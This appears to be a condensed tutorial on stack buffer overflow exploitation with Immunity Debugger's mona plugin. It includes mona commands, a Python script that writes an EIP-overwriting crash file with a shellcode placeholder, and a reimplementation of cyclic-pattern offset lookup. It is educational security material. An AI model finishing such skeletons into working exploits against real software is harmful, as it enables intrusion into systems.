Writing Exploits with Mona

Source: http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. Immunity Debugger
1. !mona update
2. Attach to the process
3. !mona config -set workingfolder c:\logs\%p
4. !mona pattern_create 2000
   !mona pattern_offset 37694136  (the EIP value observed at the crash)
5. Modify the script

print("Creating exploit.")
# Create the crash file
push = "A" * 260     # offset to EIP, found with mona pattern_offset
eip = "BBBB"         # 4 more bytes to overwrite EIP
junk = "C" * 1736    # later will be replaced with real shellcode
try:
    f = open("crash-me.PLF", "w")
    f.write(push + eip + junk)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

Our next goals will be:
1. Replacing "BBBB" with a valid pointer (an address that jumps to ESP, since ESP will point at the shellcode)
2. Solving an easy problem with the bytes after EIP (the "CCCC..." region).
3. Replacing "CCCCCC..." with real shellcode.

6. !mona jmp -r esp -o 
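The pattern_create / pattern_offset step above is the part of the procedure with an algorithm behind it, so here is an added example of that idea for crash triage. It is not mona.py and not the post's own script; it reimplements the Metasploit-style cyclic pattern (3-byte chunks of upper, lower, digit) and maps a register value captured at a crash back to the input offset it came from. The function names, the little-endian decoding of an int register value and the "reversed" fallback are assumptions of this example, not mona options.

```python
# Added example (not mona.py and not the original post's script): a minimal
# reimplementation of the cyclic-pattern idea behind "!mona pattern_create"
# and "!mona pattern_offset", used here for crash triage: given a register
# value captured at a crash, find which byte of the input landed in it.
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Metasploit-style pattern: 3-byte chunks Aa0, Aa1, ..., Az9, Ba0, ...
    Every 4-byte window is unique within the first MAX_LEN bytes, which is what
    lets a 32-bit register value map back to exactly one offset."""
    if length > MAX_LEN:
        raise ValueError("pattern longer than %d bytes is no longer unique" % MAX_LEN)
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    return full[:length]


def pattern_offset(value, length=2000):
    """Locate a crash register value inside pattern_create(length).

    `value` is either the 32-bit register value as an int (e.g. 0x37694136, the
    EIP value in the post) or the 4 ASCII characters themselves. Ints are decoded
    little-endian, as they sit in memory on x86. Returns (offset, byte_order),
    or None when the value did not come from the pattern at all (which already
    tells you the crash is not a straightforward overwrite of that register)."""
    pattern = pattern_create(length)
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    pos = pattern.find(needle)
    if pos != -1:
        return pos, "little"
    # Some crashes hand back the bytes reversed (a value that went through a
    # byte-swapping path); report that case explicitly instead of silently failing.
    pos = pattern.find(needle[::-1])
    if pos != -1:
        return pos, "reversed"
    return None


if __name__ == "__main__":
    # Constructed inputs: the EIP value quoted in the post, and a value that
    # cannot have come from the pattern (two adjacent uppercase letters never occur).
    print(pattern_offset(0x37694136))   # (260, 'little'): matches the 260 "A" bytes in the post
    print(pattern_offset(0x41414141))   # None
```

Running this with the post's EIP value 0x37694136 gives offset 260, the same number mona reported and the same length used for the "A" padding in the script above. A None result is worth noting during triage: it means the register was not overwritten directly by input bytes, so the crash needs a closer look before assuming the control-flow overwrite the post describes.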
